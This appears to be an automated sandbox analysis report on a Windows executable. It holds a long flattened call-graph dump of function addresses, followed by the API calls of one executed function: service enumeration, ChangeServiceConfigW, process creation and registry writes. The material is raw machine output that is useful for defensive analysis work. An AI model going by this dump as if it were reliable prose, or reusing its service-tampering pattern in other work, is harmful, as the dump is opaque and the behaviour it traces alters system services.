43e8f3 22815->22818 22819 43e9d1 22816->22819 22820 43e994 22817->22820 23651 40632c 10 API calls 22818->23651 22823 438860 17 API calls 22819->22823 22822 407dec 14 API calls 22820->22822 22824 43e999 22822->22824 22825 43ea10 22823->22825 22826 407450 15 API calls 22824->22826 22827 4389d8 19 API calls 22825->22827 22828 43e9a3 22826->22828 22830 43ea1f 22827->22830 22829 404cdc 14 API calls 22828->22829 22831 43e9a8 22829->22831 22832 43ea23 GetLastError 22830->22832 22833 43ea5f 22830->22833 22834 4042f8 14 API calls 22831->22834 22836 407450 15 API calls 22832->22836 22835 4396b8 70 API calls 22833->22835 22837 43e9ad 22834->22837 22838 43ea7c 22835->22838 22839 43ea3f 22836->22839 23652 40632c 10 API calls 22837->23652 22843 438860 17 API calls 22838->22843 22840 407dec 14 API calls 22839->22840 22842 43ea44 22840->22842 22844 407450 15 API calls 22842->22844 22845 43eabb 22843->22845 22846 43ea4e 22844->22846 23644 439d1c 22845->23644 22849 404cdc 14 API calls 22846->22849 22850 43ea53 22849->22850 22852 4042f8 14 API calls 22850->22852 22851 4389d8 19 API calls 22853 43eadf 22851->22853 22854 43ea58 22852->22854 22855 43eae3 GetLastError 22853->22855 22856 43eb1f 22853->22856 23653 40632c 10 API calls 22854->23653 22859 407450 15 API calls 22855->22859 22932 43f314 22931->22932 22933 43f31f 22931->22933 23673 43c31c 22932->23673 22935 43c31c 21 API calls 22933->22935 22937 43f329 22935->22937 22936 43f31e 22936->22174 22937->22174 22939 43cebb 22938->22939 22940 42f9fc 73 API calls 22939->22940 22941 43cee1 22940->22941 22941->21811 22942->21872 22943->21867 22944->21892 22945->21986 22946->22073 22947->22085 22948->21918 22949->21912 22951 405fd0 22950->22951 22954 405f2c 22951->22954 22955 405f74 22954->22955 22956 405f3c 22954->22956 22955->22187 22956->22955 22958 4430dc 22956->22958 22959 4430f6 22958->22959 22960 44314c 22958->22960 22974 406098 22959->22974 22960->22956 22962 443122 22980 409610 22962->22980 22963 443100 22963->22962 22964 406bf0 15 API calls 22963->22964 22964->22962 22968 443136 22985 415b40 GetModuleHandleW 22968->22985 22971 408f6c 37 API calls 22972 443147 22971->22972 22990 415198 82 API calls 22972->22990 22976 4060a4 22974->22976 22979 4060d5 22976->22979 22991 405fe0 69 API calls 22976->22991 22992 406034 69 API calls 22976->22992 22993 406084 69 API calls 22976->22993 22979->22963 22981 4041b0 14 API calls 22980->22981 22982 40961d 22981->22982 22983 414698 GetVersionExW 22982->22983 22984 4146af 22983->22984 22984->22968 22986 415b61 22985->22986 22987 415b51 22985->22987 22986->22971 22994 40aa94 17 API calls 22987->22994 22989 415b5c 22989->22986 22990->22960 22991->22976 22992->22976 22993->22976 22994->22989 22996 406847 22995->22996 23006 404c3c 22996->23006 22998 406852 23018 4067c8 22998->23018 23001 406344 14 API calls 23002 406884 23001->23002 23003 4068c4 23002->23003 23004 4068d8 23003->23004 23005 4068ca SysFreeString 23003->23005 23004->22193 23005->23004 23007 404c3e 23006->23007 23010 404be8 23007->23010 23014 404c69 23007->23014 23028 404be8 23007->23028 23035 40a264 14 API calls 23007->23035 23008 404cb4 23008->22998 23010->23008 23015 404bfc 23010->23015 23026 404ba4 14 API calls 23010->23026 23012 404c33 23012->22998 23014->22998 23015->23012 23027 404318 14 API calls 23015->23027 23017 404c2e 23017->22998 23019 4067d4 23018->23019 23020 404c3c 14 API calls 23019->23020 23021 4067df 23020->23021 23022 404be8 14 API calls 23021->23022 23023 406816 23022->23023 23024 406344 14 API calls 23023->23024 23025 40681f 23024->23025 23025->23001 23026->23015 23027->23017 23029 404bf4 23028->23029 23032 404bfc 23028->23032 23036 404ba4 14 API calls 23029->23036 23031 404c33 23031->23007 23032->23031 23037 404318 14 API calls 23032->23037 23034 404c2e 23034->23007 23035->23007 23036->23032 23037->23034 23041 4048dc 23038->23041 23042 4048e8 23041->23042 23043 40491d 23042->23043 23045 404318 14 API calls 23042->23045 23043->22201 23045->23043 23046->22205 23047->22208 23048->22204 23051 404450 23049->23051 23050 406f48 15 API calls 23052 4044b7 23050->23052 23051->23050 23052->22212 23054 407504 14 API calls 23053->23054 23055 406d3c 23054->23055 23056 406344 14 API calls 23055->23056 23057 40459a 23056->23057 23057->22222 23058->22227 23059->22232 23061 4388b7 23060->23061 23062 43889d 23060->23062 23066 438b0c 23061->23066 23063 4388a3 RegCloseKey 23062->23063 23064 4388ad 23062->23064 23063->23064 23065 438860 17 API calls 23064->23065 23065->23061 23067 438b36 23066->23067 23135 406c44 23066->23135 23131 43858c 23067->23131 23070 438b3e 23072 438b56 23070->23072 23139 4073dc 15 API calls 23070->23139 23073 438b84 RegOpenKeyExW 23072->23073 23074 438b93 23073->23074 23075 438b9c 23074->23075 23079 438bda 23074->23079 23076 438bc8 23075->23076 23140 407184 15 API calls 23075->23140 23141 4388bc 17 API calls 23076->23141 23080 438bfa RegOpenKeyExW 23079->23080 23081 438c09 23080->23081 23083 438c12 23081->23083 23087 438c4d 23081->23087 23082 438bd5 23082->22244 23084 438c3e 23083->23084 23142 407184 15 API calls 23083->23142 23143 4388bc 17 API calls 23084->23143 23088 438c6b RegOpenKeyExW 23087->23088 23089 438c7a 23088->23089 23089->23082 23090 438cac 23089->23090 23144 407184 15 API calls 23089->23144 23090->23082 23145 4388bc 17 API calls 23090->23145 23148 4392a0 23093->23148 23096 439422 23099 406d2c 14 API calls 23096->23099 23097 439478 23098 406bf0 15 API calls 23097->23098 23107 43946d 23098->23107 23100 439434 23099->23100 23151 4398f0 23100->23151 23102 43944c 23103 43946f 23102->23103 23105 439458 23102->23105 23159 438560 69 API calls 23103->23159 23106 406f48 15 API calls 23105->23106 23106->23107 23108 438860 23107->23108 23109 43886a 23108->23109 23110 43888e 23108->23110 23111 438870 RegFlushKey 23109->23111 23112 438876 RegCloseKey 23109->23112 23114 40e50c 23110->23114 23111->23112 23113 406bf0 15 API calls 23112->23113 23113->23110 23115 40e518 23114->23115 23116 40e53b 23115->23116 23117 40e52c 23115->23117 23119 406f48 15 API calls 23116->23119 23166 40e4bc 15 API calls 23117->23166 23120 40e539 23119->23120 23120->22259 23121->22240 23122->22240 23124 407dc4 23123->23124 23167 404cb8 23124->23167 23127->22245 23128->22258 23129->22267 23130->22292 23132 43859c 23131->23132 23134 4385cd 23132->23134 23146 4064f4 15 API calls 23132->23146 23134->23070 23137 406c48 23135->23137 23136 406c78 23136->23067 23137->23136 23147 4041cc 14 API calls 23137->23147 23139->23072 23141->23082 23143->23082 23145->23082 23146->23134 23147->23136 23160 43924c 23148->23160 23150 4392b4 23150->23096 23150->23097 23152 406c7c 23151->23152 23153 439916 RegQueryValueExW 23152->23153 23155 439929 23153->23155 23154 439951 23154->23102 23155->23154 23164 413794 69 API calls 23155->23164 23157 43994c 23165 405c30 14 API calls 23157->23165 23159->23107 23161 439264 23160->23161 23162 439278 RegQueryValueExW 23161->23162 23163 43928b 23162->23163 23163->23150 23164->23157 23166->23120 23168 404c3c 14 API calls 23167->23168 23169 404ccc 23168->23169 23170 404be8 14 API calls 23169->23170 23171 404cd9 23170->23171 23171->22256 23172->22333 23174 43c47b 23173->23174 23175 406bf0 15 API calls 23174->23175 23176 43c492 23175->23176 23177 43c4dc 23176->23177 23194 415584 16 API calls 23176->23194 23180 43c4f0 ExpandEnvironmentStringsW 23177->23180 23179 43c4ce 23181 406c44 14 API calls 23179->23181 23182 43c4fa 23180->23182 23181->23177 23182->22336 23184 406c7c 23183->23184 23185 43dc79 LoadLibraryExW 23184->23185 23186 43dc85 FindResourceW 23185->23186 23187 43dcfc 23185->23187 23186->23187 23188 43dc95 LoadResource 23186->23188 23190 40fed8 23187->23190 23188->23187 23189 43dca0 FreeLibrary 23188->23189 23189->23187 23195 40feec 23190->23195 23192 40fee7 23192->22341 23194->23179 23196 40fef5 23195->23196 23197 40ff49 23196->23197 23213 4064f4 15 API calls 23196->23213 23199 40ffa0 23197->23199 23200 40ff59 23197->23200 23203 40ff76 23199->23203 23215 4064f4 15 API calls 23199->23215 23200->23203 23214 4064f4 15 API calls 23200->23214 23204 41004b 23203->23204 23211 40ffd3 23203->23211 23205 406d2c 14 API calls 23204->23205 23209 410049 23205->23209 23206 41003e 23207 406f48 15 API calls 23206->23207 23207->23209 23208 406bf0 15 API calls 23208->23211 23209->23192 23210 406f48 15 API calls 23210->23211 23211->23206 23211->23208 23211->23210 23216 4064f4 15 API calls 23211->23216 23213->23197 23214->23203 23215->23203 23216->23211 23276 40819c 23217->23276 23221 43b1bc 23220->23221 23222 407450 15 API calls 23221->23222 23223 43b1d9 23222->23223 23224 407450 15 API calls 23223->23224 23225 43b1e1 23224->23225 23226 407450 15 API calls 23225->23226 23227 43b1eb 23226->23227 23228 404cdc 14 API calls 23227->23228 23229 43b1f0 23228->23229 23230 4042f8 14 API calls 23229->23230 23231 43b1f5 OpenSCManagerW 23230->23231 23232 43b243 23231->23232 23233 43b209 GetLastError 23231->23233 23235 43b24d OpenServiceW 23232->23235 23234 407450 15 API calls 23233->23234 23236 43b225 23234->23236 23237 43b297 ChangeServiceConfigW 23235->23237 23238 43b25a CloseServiceHandle GetLastError 23235->23238 23239 407dec 14 API calls 23236->23239 23240 43b2f7 CloseServiceHandle CloseServiceHandle 23237->23240 23241 43b2b4 CloseServiceHandle CloseServiceHandle GetLastError 23237->23241 23242 407450 15 API calls 23238->23242 23243 43b22a 23239->23243 23245 43b23e 23240->23245 23246 407450 15 API calls 23241->23246 23247 43b27c 23242->23247 23244 407450 15 API calls 23243->23244 23248 43b234 23244->23248 23245->22438 23249 43b2dc 23246->23249 23250 407dec 14 API calls 23247->23250 23251 404cdc 14 API calls 23248->23251 23252 407dec 14 API calls 23249->23252 23253 43b281 23250->23253 23254 43b239 23251->23254 23255 43b2e1 23252->23255 23256 407450 15 API calls 23253->23256 23257 4042f8 14 API calls 23254->23257 23258 407450 15 API calls 23255->23258 23259 43b28b 23256->23259 23257->23245 23261 43b2eb 23258->23261 23260 404cdc 14 API calls 23259->23260 23262 43b290 23260->23262 23263 404cdc 14 API calls 23261->23263 23264 4042f8 14 API calls 23262->23264 23265 43b2f0 23263->23265 23266 43b295 23264->23266 23267 4042f8 14 API calls 23265->23267 23266->23245 23267->23266 23269 408346 23268->23269 23273 408378 23268->23273 23270 408370 23269->23270 23269->23273 23301 40789c 23269->23301 23326 4041cc 14 API calls 23270->23326 23273->22100 23274->22442 23277 4081bb 23276->23277 23281 4081d5 23276->23281 23278 4081c6 23277->23278 23295 4042a0 14 API calls 23277->23295 23296 408194 16 API calls 23278->23296 23283 40821e 23281->23283 23297 4042a0 14 API calls 23281->23297 23282 4081d0 23282->22438 23285 40822f 23283->23285 23298 4042a0 14 API calls 23283->23298 23287 408238 23285->23287 23288 40826d 23285->23288 23299 4041e4 14 API calls 23287->23299 23289 4041b0 14 API calls 23288->23289 23291 408277 23289->23291 23292 408268 23291->23292 23300 40817c 20 API calls 23291->23300 23292->23282 23294 40819c 20 API calls 23292->23294 23294->23292 23295->23278 23296->23282 23297->23283 23298->23285 23299->23292 23300->23292 23302 4078a5 23301->23302 23305 4078e2 23301->23305 23303 4078e7 23302->23303 23304 4078ba 23302->23304 23306 4078f8 23303->23306 23307 4078ee 23303->23307 23304->23305 23308 4078c2 23304->23308 23309 407904 23304->23309 23305->23270 23327 406368 14 API calls 23306->23327 23310 406344 14 API calls 23307->23310 23314 4078c6 23308->23314 23315 407938 23308->23315 23312 407915 23309->23312 23313 40790b 23309->23313 23310->23305 23328 4068dc SysFreeString 23312->23328 23316 4068c4 SysFreeString 23313->23316 23318 407947 23314->23318 23319 4078ca 23314->23319 23315->23305 23329 407884 14 API calls 23315->23329 23316->23305 23318->23305 23322 40789c 16 API calls 23318->23322 23321 407965 23319->23321 23325 4078d2 23319->23325 23321->23305 23330 40784c 16 API calls 23321->23330 23322->23318 23324 408340 16 API calls 23324->23325 23325->23305 23325->23324 23326->23273 23327->23305 23328->23305 23329->23315 23330->23321 23415 40f8fc 23331->23415 23333 40f9eb 23421 40730c 23333->23421 23335 40f9fc 23336 40f7c4 23335->23336 23337 406c7c 23336->23337 23338 40f7ce GetFileAttributesW 23337->23338 23339 40f7d9 23338->23339 23339->22510 23339->22623 23341 40f7fd 23340->23341 23342 40f835 23341->23342 23443 4136c4 69 API calls 23341->23443 23433 414f3c 23342->23433 23346 40f825 23444 405c30 14 API calls 23346->23444 23347 406c44 14 API calls 23349 40f84b 23347->23349 23350 40f868 23349->23350 23445 4064f4 15 API calls 23349->23445 23352 40f876 23350->23352 23353 40f7c4 GetFileAttributesW 23350->23353 23354 40f886 23352->23354 23355 40f9d8 15 API calls 23352->23355 23353->23352 23358 40f9d8 15 API calls 23354->23358 23360 40f8c6 23354->23360 23356 40f895 23355->23356 23357 4072a4 15 API calls 23356->23357 23357->23354 23359 40f8b2 23358->23359 23361 40f7e8 71 API calls 23359->23361 23360->22531 23362 40f8ba 23361->23362 23362->23360 23440 40fb5c 23362->23440 23365 406bf0 23364->23365 23366 40716f 23364->23366 23365->23364 23367 4070b0 23365->23367 23369 406c00 23365->23369 23371 406c10 23365->23371 23367->23366 23370 406bf0 15 API calls 23367->23370 23374 4070c3 23367->23374 23368 406c40 23368->22540 23369->23371 23373 407504 14 API calls 23369->23373 23370->23374 23371->23368 23457 4041cc 14 API calls 23371->23457 23372 40710c 23372->23366 23378 407504 14 API calls 23372->23378 23373->23371 23377 4070ee 23374->23377 23458 406504 15 API calls 23374->23458 23377->23372 23459 406504 15 API calls 23377->23459 23380 407122 23378->23380 23382 40715a 23380->23382 23460 406368 14 API calls 23380->23460 23383 406bf0 15 API calls 23382->23383 23384 40716b 23383->23384 23384->22540 23386 406c7c 23385->23386 23387 40f787 GetFileAttributesW 23386->23387 23388 40f792 23387->23388 23389 40f79a GetLastError 23387->23389 23388->22552 23390 40f7a6 23389->23390 23391 40f7bb 23389->23391 23390->23391 23392 40f7b0 23390->23392 23391->22552 23461 40f73c FindFirstFileW FindClose 23392->23461 23394 40f7b7 23394->23391 23396 43cc63 23395->23396 23462 42f9fc 23396->23462 23398 43cc91 23466 42f7b0 23398->23466 23400 43ccad 23401 407450 15 API calls 23400->23401 23402 43cd49 23401->23402 23403 407450 15 API calls 23402->23403 23404 43cd51 23403->23404 23405 407450 15 API calls 23404->23405 23406 43cd5b 23405->23406 23407 407450 15 API calls 23406->23407 23408 43cd63 23407->23408 23409 404cdc 14 API calls 23408->23409 23410 43cd68 23409->23410 23411 4042f8 14 API calls 23410->23411 23412 43cd6d 23411->23412 23412->22513 23413->22623 23414->22556 23416 40f912 23415->23416 23419 40f93d 23416->23419 23430 4064f4 15 API calls 23416->23430 23418 40f9b2 23418->23333 23419->23418 23420 4064f4 15 API calls 23419->23420 23420->23419 23422 407322 23421->23422 23424 40734d 23422->23424 23431 4064f4 15 API calls 23422->23431 23425 407395 23424->23425 23426 4073a8 23424->23426 23427 406d2c 14 API calls 23425->23427 23432 406d1c 15 API calls 23426->23432 23429 4073a6 23427->23429 23429->23335 23430->23419 23431->23424 23432->23429 23434 406bf0 15 API calls 23433->23434 23435 414f4c 23434->23435 23446 414e7c 23435->23446 23437 414f66 23438 40f840 23437->23438 23439 406f48 15 API calls 23437->23439 23438->23347 23439->23438 23441 406c7c 23440->23441 23442 40fb68 CreateDirectoryW 23441->23442 23442->23360 23443->23346 23445->23350 23447 414e8e 23446->23447 23450 414ebd 23447->23450 23454 4064f4 15 API calls 23447->23454 23448 414ef0 23453 414f0b 23448->23453 23456 414728 15 API calls 23448->23456 23450->23448 23455 4064f4 15 API calls 23450->23455 23453->23437 23454->23450 23455->23448 23456->23453 23457->23368 23458->23377 23459->23372 23460->23382 23461->23394 23463 42fa06 23462->23463 23471 42fb48 FindResourceW 23463->23471 23465 42fa36 23465->23398 23483 42f548 23466->23483 23468 42f7ca 23487 42f798 69 API calls 23468->23487 23470 42f7e5 23470->23400 23472 42fb74 LoadResource 23471->23472 23473 42fb6d 23471->23473 23474 42fb87 23472->23474 23475 42fb8e SizeofResource LockResource 23472->23475 23481 42faa8 69 API calls 23473->23481 23482 42faa8 69 API calls 23474->23482 23478 42fbac 23475->23478 23478->23465 23479 42fb73 23479->23472 23480 42fb8d 23480->23475 23481->23479 23482->23480 23484 42f551 23483->23484 23488 42f58c 23484->23488 23486 42f56d 23486->23468 23487->23470 23489 42f5a7 23488->23489 23490 42f5d3 23489->23490 23491 42f64f 23489->23491 23513 40f650 23490->23513 23521 40f5f8 CreateFileW 23491->23521 23494 42f659 23512 42f64d 23494->23512 23522 40fa54 17 API calls 23494->23522 23496 42f5f0 23496->23512 23517 40fa54 17 API calls 23496->23517 23497 406bf0 15 API calls 23500 42f6bc 23497->23500 23498 42f674 GetLastError 23523 412bfc 15 API calls 23498->23523 23500->23486 23502 42f60f GetLastError 23518 412bfc 15 API calls 23502->23518 23503 42f68b 23524 413794 69 API calls 23503->23524 23506 42f626 23519 413794 69 API calls 23506->23519 23507 42f6ad 23525 405c30 14 API calls 23507->23525 23510 42f648 23520 405c30 14 API calls 23510->23520 23512->23497 23514 40f667 23513->23514 23515 40f68f 23513->23515 23516 40f689 CreateFileW 23514->23516 23515->23496 23516->23515 23517->23502 23518->23506 23519->23510 23521->23494 23522->23498 23523->23503 23524->23507 23527 406c44 14 API calls 23526->23527 23528 438a04 23527->23528 23529 43858c 15 API calls 23528->23529 23530 438a0c 23529->23530 23531 438a24 23530->23531 23552 4073dc 15 API calls 23530->23552 23533 438a35 23531->23533 23535 438a65 23531->23535 23534 438a51 RegOpenKeyExW 23533->23534 23538 438a60 23534->23538 23536 438a8b RegCreateKeyExW 23535->23536 23536->23538 23537 438ad3 23537->22661 23538->23537 23539 438ac6 23538->23539 23553 407184 15 API calls 23538->23553 23554 4388bc 17 API calls 23539->23554 23543 439392 23542->23543 23544 4393bd 23543->23544 23563 4064f4 15 API calls 23543->23563 23555 43987c 23544->23555 23547 4393e3 23547->22670 23548->22657 23549->22657 23550->22663 23552->23531 23554->23537 23556 439895 23555->23556 23557 4398a9 RegSetValueExW 23556->23557 23558 4398bc 23557->23558 23559 4398e4 23558->23559 23564 413794 69 API calls 23558->23564 23559->23547 23561 4398df 23565 405c30 14 API calls 23561->23565 23563->23544 23564->23561 23567 43ae3c 23566->23567 23568 407450 15 API calls 23567->23568 23569 43ae60 23568->23569 23570 407450 15 API calls 23569->23570 23571 43ae68 23570->23571 23572 407450 15 API calls 23571->23572 23573 43ae72 23572->23573 23574 404cdc 14 API calls 23573->23574 23575 43ae77 23574->23575 23576 4042f8 14 API calls 23575->23576 23577 43ae7c OpenSCManagerW 23576->23577 23578 43ae90 GetLastError 23577->23578 23579 43aeca 23577->23579 23580 407450 15 API calls 23578->23580 23582 43aed4 OpenServiceW 23579->23582 23581 43aeac 23580->23581 23585 407dec 14 API calls 23581->23585 23583 43af21 QueryServiceConfigW 23582->23583 23584 43aee1 CloseServiceHandle GetLastError 23582->23584 23588 43af33 23583->23588 23589 43af51 23583->23589 23586 407450 15 API calls 23584->23586 23587 43aeb1 23585->23587 23590 43af03 23586->23590 23592 407450 15 API calls 23587->23592 23593 407450 15 API calls 23588->23593 23591 4041b0 14 API calls 23589->23591 23594 407dec 14 API calls 23590->23594 23595 43af5b QueryServiceConfigW 23591->23595 23596 43aebb 23592->23596 23597 43af42 23593->23597 23598 43af08 23594->23598 23599 43af71 23595->23599 23600 43afbe 23595->23600 23601 404cdc 14 API calls 23596->23601 23602 404cdc 14 API calls 23597->23602 23605 407450 15 API calls 23598->23605 23627 4041cc 14 API calls 23599->23627 23628 4041cc 14 API calls 23600->23628 23607 43aec0 23601->23607 23603 43af47 23602->23603 23608 4042f8 14 API calls 23603->23608 23610 43af12 23605->23610 23612 4042f8 14 API calls 23607->23612 23613 43af1c 23608->23613 23609 43afd1 CloseServiceHandle CloseServiceHandle 23614 43aec5 23609->23614 23615 404cdc 14 API calls 23610->23615 23611 43af7b CloseServiceHandle CloseServiceHandle GetLastError 23616 407450 15 API calls 23611->23616 23612->23614 23613->23614 23614->22687 23617 43af17 23615->23617 23618 43afa3 23616->23618 23619 4042f8 14 API calls 23617->23619 23620 407dec 14 API calls 23618->23620 23619->23613 23621 43afa8 23620->23621 23622 407450 15 API calls 23621->23622 23623 43afb2 23622->23623 23624 404cdc 14 API calls 23623->23624 23625 43afb7 23624->23625 23626 4042f8 14 API calls 23625->23626 23626->23613 23627->23611 23628->23609 23629->22700 23631->22708 23633->22713 23635->22732 23636->22735 23637->22779 23638->22780 23639->22780 23640->22780 23642 439674 70 API calls 23641->23642 23643 4396c0 23642->23643 23643->22803 23663 4399a0 23644->23663 23646 439d58 23647 439d64 23646->23647 23648 439d5e RegCloseKey 23646->23648 23647->22808 23647->22851 23648->23647 23649->22791 23650->22791 23651->22796 23652->22813 23653->22833 23664 406c44 14 API calls 23663->23664 23665 4399c9 23664->23665 23666 43858c 15 API calls 23665->23666 23667 4399d1 23666->23667 23669 4399e9 23667->23669 23672 4073dc 15 API calls 23667->23672 23670 439a0a RegOpenKeyExW 23669->23670 23671 439a25 23670->23671 23671->23646 23672->23669 23674 43c32e 23673->23674 23690 4074fc 23674->23690 23676 43c35c 23677 43c378 CreateProcessW 23676->23677 23678 43c3b7 CloseHandle WaitForSingleObject CloseHandle 23677->23678 23679 43c384 GetLastError 23677->23679 23682 43c3b5 23678->23682 23680 407450 15 API calls 23679->23680 23681 43c39c 23680->23681 23683 407dec 14 API calls 23681->23683 23682->22936 23684 43c3a1 23683->23684 23685 407450 15 API calls 23684->23685 23686 43c3ab 23685->23686 23687 404cdc 14 API calls 23686->23687 23688 43c3b0 23687->23688 23689 4042f8 14 API calls 23688->23689 23689->23682 23691 4074a8 23690->23691 23692 4074f5 23691->23692 23693 4074bb 23691->23693 23698 4064ec 15 API calls 23691->23698 23692->23676 23693->23692 23695 407504 14 API calls 23693->23695 23696 4074cf 23695->23696 23696->23692 23699 4041cc 14 API calls 23696->23699 23698->23693 23699->23692 23700 42da28 23701 42da56 23700->23701 23702 408334 20 API calls 23701->23702 23703 42da89 23702->23703 23710 416308 23703->23710 23705 42daa3 23731 416e30 23705->23731 23708 42dacc 23709 402990 VirtualAlloc 23709->23708 23711 416332 23710->23711 23721 416352 23710->23721 23738 416ea0 InterlockedCompareExchange 23711->23738 23713 40789c 16 API calls 23715 4163fd 23713->23715 23714 416337 23716 416356 23714->23716 23717 41634d 23714->23717 23715->23705 23740 416270 InterlockedCompareExchange 23716->23740 23739 416ea0 InterlockedCompareExchange 23717->23739 23720 41635b 23722 416371 23720->23722 23723 41637a 23720->23723 23721->23713 23741 416270 InterlockedCompareExchange 23722->23741 23742 416edc 71 API calls 23723->23742 23726 41637f 23727 416395 23726->23727 23728 41639e 23726->23728 23743 416edc 71 API calls 23727->23743 23744 416dbc 71 API calls 23728->23744 23745 416b68 23731->23745 23733 416e5f 23734 406d2c 14 API calls 23733->23734 23735 416e74 23734->23735 23736 408340 16 API calls 23735->23736 23737 416e8f 23736->23737 23737->23709 23738->23714 23739->23721 23740->23720 23741->23721 23742->23726 23743->23721 23744->23721 23746 416b9a 23745->23746 23747 416b7f 23745->23747 23748 416bc2 23746->23748 23787 413794 69 API calls 23746->23787 23747->23746 23785 4136c4 69 API calls 23747->23785 23754 416bea 23748->23754 23789 413794 69 API calls 23748->23789 23751 416b95 23786 405c30 14 API calls 23751->23786 23752 416bbd 23788 405c30 14 API calls 23752->23788 23758 416c1b 23754->23758 23791 413794 69 API calls 23754->23791 23757 416be5 23790 405c30 14 API calls 23757->23790 23767 416a78 23758->23767 23762 416c16 23792 405c30 14 API calls 23762->23792 23765 408334 20 API calls 23766 416c42 23765->23766 23766->23733 23768 416aaa 23767->23768 23769 416a8f 23767->23769 23770 416ad2 23768->23770 23795 413794 69 API calls 23768->23795 23769->23768 23793 4136c4 69 API calls 23769->23793 23776 416afa 23770->23776 23797 413794 69 API calls 23770->23797 23773 416aa5 23794 405c30 14 API calls 23773->23794 23774 416acd 23796 405c30 14 API calls 23774->23796 23781 416b2b 23776->23781 23799 413794 69 API calls 23776->23799 23779 416af5 23798 405c30 14 API calls 23779->23798 23781->23765 23783 416b26 23800 405c30 14 API calls 23783->23800 23785->23751 23787->23752 23789->23757 23791->23762 23793->23773 23795->23774 23797->23779 23799->23783 23801 40472c 23802 404742 23801->23802 23803 404748 23802->23803 23804 4047a5 CreateFileW 23802->23804 23805 404857 GetStdHandle 23802->23805 23806 4047c3 23804->23806 23807 4048cb GetLastError 23804->23807 23805->23807 23810 404892 23805->23810 23809 4047d1 GetFileSize 23806->23809 23806->23810 23807->23803 23809->23807 23811 4047e5 SetFilePointer 23809->23811 23810->23803 23812 40489c GetFileType 23810->23812 23811->23807 23815 404801 ReadFile 23811->23815 23812->23803 23814 4048b7 CloseHandle 23812->23814 23814->23803 23815->23807 23816 404823 23815->23816 23816->23810 23817 404836 SetFilePointer 23816->23817 23817->23807 23818 40484b SetEndOfFile 23817->23818 23818->23807 23819 404855 23818->23819 23819->23810

                                                                                Executed Functions

                                                                                Function 0043B7D4 Relevance: 33.6, APIs: 9, Strings: 10, Instructions: 336serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 637 43b7d4-43b7d7 638 43b7dc-43b7e1 637->638 638->638 639 43b7e3-43b7f4 638->639 640 43b7f8-43b80a OpenSCManagerW 639->640 641 43b848-43b8a9 call 408334 call 40816c call 404a04 call 40816c EnumServicesStatusExW 640->641 642 43b80c-43b843 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 640->642 660 43b8af-43b8bc GetLastError 641->660 661 43b99e-43b9b5 CloseServiceHandle call 40816c 641->661 642->641 664 43b8fe-43b95a call 408334 call 40816c call 404a04 call 40816c EnumServicesStatusExW 660->664 665 43b8be-43b8f9 CloseServiceHandle call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 660->665 671 43ba22-43ba26 661->671 672 43b9b7-43b9b8 661->672 664->661 714 43b95c-43b999 CloseServiceHandle GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 664->714 665->661 675 43ba4b-43ba52 671->675 676 43ba28-43ba46 call 407450 call 404cdc call 4042f8 call 40632c 671->676 677 43b9ba-43b9c5 672->677 682 43ba54-43ba58 675->682 683 43ba9f-43baf7 call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 408334 call 40816c 675->683 676->675 677->671 681 43b9c7-43b9f6 call 406d9c call 40e50c * 2 call 4072a4 677->681 738 43b9f8-43ba1c call 406d9c 681->738 739 43ba1e-43ba20 681->739 690 43ba5a-43ba78 call 407450 call 404cdc call 4042f8 call 40632c 682->690 691 43ba7d-43ba91 call 43b1a8 call 43b58c 682->691 752 43bb80-43bb9b call 406bf0 call 40816c 683->752 753 43bafd-43bafe 683->753 690->691 717 43ba96-43ba9a 691->717 714->661 717->640 738->671 739->671 739->677 766 43bbe4-43bbeb 752->766 767 43bb9d-43bb9e 752->767 755 43bb00-43bb0a 753->755 755->752 758 43bb0c-43bb19 755->758 760 43bb1b-43bb37 call 406d9c call 4072a4 758->760 761 43bb7c-43bb7e 758->761 760->761 777 43bb39-43bb77 call 40816c call 408334 call 40816c call 406d9c 760->777 761->752 761->755 769 43bc13-43bc27 call 407450 call 404cdc call 4042f8 766->769 770 43bbed-43bc11 call 407450 * 2 call 404cdc call 4042f8 766->770 768 43bba0-43bba7 767->768 773 43bba9-43bbbc call 406bf0 768->773 774 43bbbe-43bbdb call 407184 768->774 794 43bc2c-43bc5c call 406be8 call 406be0 call 408340 769->794 770->794 785 43bbe0-43bbe2 773->785 774->785 777->761 785->766 785->768
                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                • GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B953
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B95D
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B962
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
